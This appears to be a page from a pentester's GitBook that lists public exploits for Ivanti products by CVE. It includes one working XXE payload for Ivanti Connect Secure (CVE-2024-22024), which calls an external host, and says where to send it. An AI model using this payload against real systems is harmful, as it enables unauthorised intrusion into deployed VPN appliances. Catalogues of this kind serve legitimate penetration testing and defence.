Ivanti

Ivanti products - public exploits

CVE-2025-4427 and CVE-2025-4428

Ivanti EPMM Pre-Auth RCE Chain

CVE-2025-22457

Ivanti Endpoint Manager – Multiple Credential Coercion Vulnerabilities

Authenticated RCE via OpenSSL CRLF Injection (CVE-2024-37404)

Ivanti Avalanche - CVE-2024-38653

Impacting versions 6.3.1, 6.4.0 (tested), 6.4.1, and 6.3.4.

Ivanti Endpoint Manager Unauthorized XXE Exploit - CVE-2024-37397

Ivanti Pulse Secure - SSRF Vulnerability

Ivanti Connect Secure

CVE-2025-0282 - RCE

CVE-2024-22024

payload encoded base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to /dana-na/auth/saml-sso.cgi with SAMLRequest parm

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Last updated